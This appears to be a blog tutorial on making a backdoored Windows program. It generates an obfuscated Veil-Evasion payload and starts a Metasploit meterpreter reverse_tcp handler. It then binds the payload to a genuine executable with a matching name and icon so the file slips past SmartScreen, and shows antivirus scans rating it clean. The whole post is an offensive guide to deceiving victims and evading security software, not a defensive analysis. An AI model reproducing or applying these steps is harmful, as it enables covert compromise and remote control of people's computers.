Tutorial Requirements:
1- Veil Evasion: https://github.com/Veil-Framework/Veil-Evasion
2- Metasploit on Kali Linux
3- Windows Machine to emulate the victim
4- Smart Bind –>> is a tool that’s going to bind the payload with the real program. I uploaded it to Filedropper, but also you can Google it: http://www.filedropper.com/smartbinderv20_1
Tutorial Guidelines:
Step 1: Generate Veil Evasion Payload
Note: this step requires installing Veil Evasion first.
·
Start the tool by typing:
>>>> ./Veil
Evasion
The tool is very simple to use; we’ll will start by listing all the available payloads by typing:
>>>> list
·
After choosing our payload type, we set the
local host and local port:
·
Set Pyherion to Y for Yes. this is for
encryption
·
Set LHOST as your Internal_IP
·
Set LPORT as your local port or leave it as the
default.
- Type generate to create the payload
·
Type the name of output file and hit enter.
Note: Try to choose a name that’s exactly similar to the
real one.
·
Choose number 2 for Pwnstaller
to obfuscate the code for more evasion and hit enter. Sometimes, encryption
method is not enough. You need to add obfuscation to get the intended results.
·
After you hit enter, the payload is going to be
created and saved in /user/share/veil-output/compiled/nameOfFile
Step 2: Starting a Handler with Metasploit
Now that our payload is ready to go, we’re going to set up our handler to
ensure getting a connection back to our machine.Note: a handler is basically creating a connection between the hacker’s machine and the victim either locally (local network) or over the internet.
·
First, start Metasploit by typing:
>>>> msfconsole
·
Create the handler, by typing:
>>>>> use
exploit/multi/handler
·
Set the payload type:
>>>>
set PAYLOAD windows/meterpreter/reverse_tcp
·
Set the local host and local port (local
network)
Note: The Listening IP and Port must match the ones in your
payload. You cannot get connection by using different port number or IP.
·
After setting everything up, type exploit to
start listening:
>>>>
exploit -j
Step 3 : Bind the payload with an Executable File:
This step is very important for creating a legitimate looking backdoor that
not only evades anti-virus detectors, but also looks like the real one.We’re going to use a program known as SmartBind. The program binds your payload with legitimate executable file along with changing its icons to match the real one.
When you generate Veil-Evasion payload and try to use it on a Windows machine, the executable file would look suspicious, and not trustworthy. See the image below:
Plus, when you click on it, the Windows SamrtScreen will warn you the application is unrecognized and not safe to run. As a result, the user may not run the app and we’ll fail our mission.
Note: The reason the app is not recognized because it lacks a certified digital signature or certificate.
Binding the payload with a legitimate application will pass this screen. Instead, you’ll get UAC (User Account Control) – this is the regular notification when you’re installing a new application.
Note: This program (SamrtBind) may alert your antivirus. Therefore, use it on your virtual machine.
·
Choose the icon that resembles the real program.
In this case, we are using the Google icon.
·
Click add Files to add your payload.
·
Click add Files again to add your real
executable program.
Once all of them are added, click on Save Output File and save it where you
want. Then, click on Bind Files.As you see the app looks greatly unsuspicious.
Step 4: Scanning Time
Now the application is ready, it’s time to scan it to make sure it’s 100 percent clean.I used two anti-viruses for scanning: Kaspersky and Norton.
As you see, both of these anti-viruses marked it a CLEANNN!!!!
No comments:
Post a Comment